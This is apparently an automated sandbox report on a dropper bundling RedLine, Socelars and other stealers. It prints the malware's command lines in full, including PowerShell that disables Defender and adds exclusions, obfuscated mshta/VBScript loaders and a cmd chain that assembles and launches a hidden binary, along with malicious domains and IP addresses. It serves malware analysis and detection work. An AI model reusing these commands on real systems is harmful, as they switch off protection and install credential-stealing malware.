Malware Analysis Report

2025-01-02 05:59

Sample ID 241123-xabvfazpgv
Target e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe
SHA256 e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef
Tags
fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview, Signatures)
Analysis: behavioral4 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral1 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral2 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)
Analysis: behavioral3 (Detonation Overview, Command Line, Signatures, Processes, Network, Files)

Analysis Overview

score
10/10

SHA256

e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef

Threat Level: Known bad

The file e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe was found to be: Known bad.

Malicious Activity Summary

Tags: fabookie gcleaner nullmixer onlylogger privateloader redline socelars chrisnew aspackv2 discovery dropper execution infostealer loader spyware stealer

Families detected

Fabookie (Fabookie family, Detect Fabookie payload)
GCleaner (Gcleaner family)
NullMixer (Nullmixer family)
OnlyLogger (Onlylogger family, OnlyLogger payload)
PrivateLoader (Privateloader family)
RedLine (Redline family, RedLine payload)
Socelars (Socelars family, Socelars payload)

Behaviour signatures

Command and Scripting Interpreter: PowerShell
Executes dropped EXE
ASPack v2.12-2.42
Reads user/profile data of web browsers
Checks computer location settings
Loads dropped DLL
Checks installed software on the system
Drops Chrome extension
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Blocklisted process makes network request
Looks up geolocation information via web service
Suspicious use of SetThreadContext
Unsigned PE
System Location Discovery: System Language Discovery
Program crash
Browser Information Discovery
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Suspicious use of SendNotifyMessage
Modifies registry class
Modifies data under HKEY_USERS
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
Suspicious use of FindShellTrayWindow
Modifies Internet Explorer settings
Suspicious use of WriteProcessMemory
Enumerates system info in registry
Checks SCSI registry key(s)
Kills process with taskkill
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-23 18:38

Signatures

Unsigned PE (2 hits; no indicator or process detail recorded)

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-23 18:38

Reported

2024-11-23 18:40

Platform

win10v2004-20241007-en

Max time kernel

68s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload (1 hit; no indicator detail recorded)

Fabookie (tags: spyware stealer fabookie)

Fabookie family (tags: fabookie)

GCleaner (tags: loader gcleaner)

Gcleaner family (tags: gcleaner)

NullMixer (tags: dropper nullmixer)

Nullmixer family (tags: nullmixer)

OnlyLogger (tags: loader onlylogger)

Onlylogger family (tags: onlylogger)

PrivateLoader (tags: loader privateloader)

Privateloader family (tags: privateloader)

RedLine (tags: infostealer redline)

RedLine payload (1 hit; no indicator detail recorded)

Redline family (tags: redline)

Socelars (tags: stealer socelars)

Socelars family (tags: socelars)

Socelars payload (1 hit; no indicator detail recorded)

OnlyLogger payload (2 hits; no indicator detail recorded)

Command and Scripting Interpreter: PowerShell (tags: execution)

Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (2 hits)

ASPack v2.12-2.42 (tags: aspackv2; 3 hits, no indicator detail recorded)

Checks computer location settings

Registry value queried: \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation, by:
C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe
C:\Windows\SysWOW64\mshta.exe (3 hits)
C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

Reads user/profile data of web browsers (tags: spyware stealer)

Blocklisted process makes network request

Process: C:\Windows\SysWOW64\msiexec.exe

Drops Chrome extension

File created: C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json, by C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

Legitimate hosting services abused for malware hosting/C2

Indicators: pastebin.com (3 hits), iplogger.org (4 hits)

Looks up external IP address via web service

Indicator: ip-api.com

Looks up geolocation information via web service

Suspicious use of SetThreadContext

PID 5088 set thread context of PID 1620; process C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe, target C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe (both the same image)

Browser Information Discovery (tags: discovery)

Enumerates physical storage devices

System Location Discovery: System Language Discovery (tags: discovery)

Registry key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by:
C:\Windows\SysWOW64\cmd.exe (20 hits)
C:\Windows\SysWOW64\mshta.exe (3 hits)
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (2 hits)
C:\Windows\SysWOW64\taskkill.exe (2 hits)
C:\Windows\SysWOW64\msiexec.exe
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe (2 hits)
C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp
C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1487ca754e680f91.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat144474a564d26f29.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe
C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe
C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

Checks SCSI registry key(s)

Registry key \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI opened, queried and enumerated by C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe

Enumerates system info in registry

Registry key \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS opened, and the values SystemProductName and SystemManufacturer queried, by C:\Program Files\Google\Chrome\Application\chrome.exe

Kills process with taskkill (tags: evasion)

Process: C:\Windows\SysWOW64\taskkill.exe (2 hits)

Modifies data under HKEY_USERS

Key created: \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry, by C:\Program Files\Google\Chrome\Application\chrome.exe
Value set (int): \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768607472648869", by C:\Program Files\Google\Chrome\Application\chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Process: C:\Program Files\Google\Chrome\Application\chrome.exe (3 hits)

Suspicious use of AdjustPrivilegeToken

Process: C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe
  Token: SeDebugPrivilege
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (2 hits)
  Token: SeDebugPrivilege
Process: C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe
  Tokens: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, 31, 32, 33, 34, 35 (the whole privilege range in one sweep; 31 to 35 are privilege LUIDs the sandbox reported numerically)
Process: C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14f1396dfcf191bd.exe
  Token: SeDebugPrivilege
Process: C:\Windows\SysWOW64\taskkill.exe (2 hits)
  Token: SeDebugPrivilege
Process: C:\Program Files\Google\Chrome\Application\chrome.exe (12 hits each)
  Tokens: SeShutdownPrivilege, SeCreatePagefilePrivilege

Suspicious use of FindShellTrayWindow

Process: C:\Program Files\Google\Chrome\Application\chrome.exe (26 hits)

Suspicious use of SendNotifyMessage

Process: C:\Program Files\Google\Chrome\Application\chrome.exe (24 hits)

Suspicious use of UnmapMainImage

Process: C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

Suspicious use of WriteProcessMemory

Source PID -> target PID (hits): source process -> target process
4224 -> 3140 (3): C:\Users\Admin\AppData\Local\Temp\setup_installer.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe
3140 -> 1704, 1564, 3992, 4020, 3296, 2660, 4216, 4512, 4532, 4756, 2352, 1212, 1248, 4724 (3 each): C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe -> C:\Windows\SysWOW64\cmd.exe
1564 -> 1444 (3): C:\Windows\SysWOW64\cmd.exe -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
1704 -> 4964 (3): C:\Windows\SysWOW64\cmd.exe -> C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
2660 -> 3552 (2): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe
4512 -> 2920 (3): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe
1212 -> 5088 (3): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe
4216 -> 1596 (3): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe
2352 -> 4496 (2): C:\Windows\SysWOW64\cmd.exe -> C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08061237\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14f1396dfcf191bd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142b09ae40c44cf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14514904a4b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14d32a38896785b13.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14febbc433.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat144474a564d26f29.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14b47e86b9c16b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1427fbafcf251.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1481f5a7e3eccdd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14d32a38896785b13.exe

Sat14d32a38896785b13.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142ac5249376e895.exe

Sat142ac5249376e895.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14f1396dfcf191bd.exe

Sat14f1396dfcf191bd.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1487ca754e680f91.exe

Sat1487ca754e680f91.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14b47e86b9c16b.exe

Sat14b47e86b9c16b.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe

Sat142b09ae40c44cf.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14febbc433.exe

Sat14febbc433.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe

Sat1481f5a7e3eccdd.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14514904a4b.exe

Sat14514904a4b.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat14a7594cc5a0116.exe

Sat14a7594cc5a0116.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat144474a564d26f29.exe

Sat144474a564d26f29.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3140 -ip 3140

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1596 -ip 1596

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1427fbafcf251.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1252 -ip 1252

C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-QJ90B.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$70066,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3140 -s 596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1252 -s 356

C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe

"C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-4OPRC.tmp\Sat1481f5a7e3eccdd.tmp" /SL5="$90242,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat1481f5a7e3eccdd.exe" /SILENT

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If """" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 1620 -ip 1620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 664

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1620 -s 12

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "" == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\7zS08061237\Sat142b09ae40c44cf.exe" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 1596 -ip 1596

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 640

C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE

JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Sat142b09ae40c44cf.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCRIPT: cLOsE (CreaTEobject ( "wscRiPT.sHELl" ). rUN ( "cmD.EXE /C TYPe ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If ""/p~P_UpSUZjMkOKsY "" == """" for %f iN ( ""C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE"" ) do taskkill -iM ""%~NXf"" /f " , 0 , tRUe) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 824

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /C TYPe "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" > JYCWewAX2vPOJ.EXE && stArT JyCwewAX2vPOJ.eXe /p~P_UpSUZjMkOKsY & If "/p~P_UpSUZjMkOKsY " == "" for %f iN ( "C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE" ) do taskkill -iM "%~NXf" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 632

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbSCriPT: CLOSe (CReAteoBject ( "wSCRiPt.SHeLL" ). Run ( "CmD.exE /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = ""MZ"" >PajLCM.4 & CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7 " , 0 , truE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /Q /R EcHO Soy%TimE%jk> 1hsQZ.62D &ecHO | sEt /P = "MZ" >PajLCM.4& CoPy /Y /b PAjlCM.4 + lKYqBUE.m + VUR_hcMP.3T + U9bIUq0J.~DW + I5glXU.Q + 9h1gI_nY.T + 1HSQZ.62D 2KSA.Gf7 & STaRT msiexec -y .\2KSA.GF7

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ecHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>PajLCM.4"

C:\Windows\SysWOW64\msiexec.exe

msiexec -y .\2KSA.GF7

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffdcef1cc40,0x7ffdcef1cc4c,0x7ffdcef1cc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1916,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1912 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2148,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2604 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3096,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3116 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3124,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3164 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4524,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4572 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 896

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4344,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4312 /prefetch:8

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1060

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1068

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1596 -ip 1596

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1596 -s 1332

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5044,i,3526157528653320939,2773811831244326011,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 marianu.xyz udp
US 8.8.8.8:53 cdn.discordapp.com udp
NL 45.133.1.107:80 tcp
NL 45.133.1.107:80 tcp
US 162.159.133.233:443 cdn.discordapp.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 ip-api.com udp
US 8.8.8.8:53 www.listincode.com udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 233.133.159.162.in-addr.arpa udp
US 8.8.8.8:53 niemannbest.me udp
US 8.8.8.8:53 all-mobile-pa1ments.com.mx udp
US 8.8.8.8:53 buy-fantasy-football.com.sg udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 topniemannpickshop.cc udp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.200.3:80 c.pki.goog tcp
US 8.8.8.8:53 46.2.26.104.in-addr.arpa udp
US 104.26.2.46:443 iplogger.org tcp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 3.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 ppgggb.com udp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 gcl-gb.biz udp
N/A 127.0.0.1:54047 tcp
N/A 127.0.0.1:54049 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 www.iyiqian.com udp
SG 13.251.16.150:80 www.iyiqian.com tcp
US 8.8.8.8:53 t.gogamec.com udp
US 8.8.8.8:53 150.16.251.13.in-addr.arpa udp
US 8.8.8.8:53 www.google.com udp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
GB 172.217.16.228:443 www.google.com tcp
US 8.8.8.8:53 35.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 42.169.217.172.in-addr.arpa udp
US 8.8.8.8:53 228.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 gcl-gb.biz udp
GB 172.217.16.228:443 www.google.com udp
US 8.8.8.8:53 clients2.google.com udp
GB 142.250.178.14:443 clients2.google.com tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
US 8.8.8.8:53 14.178.250.142.in-addr.arpa udp
US 8.8.8.8:53 t.gogamec.com udp
NL 45.9.20.13:80 tcp
US 8.8.8.8:53 staticimg.youtuuee.com udp
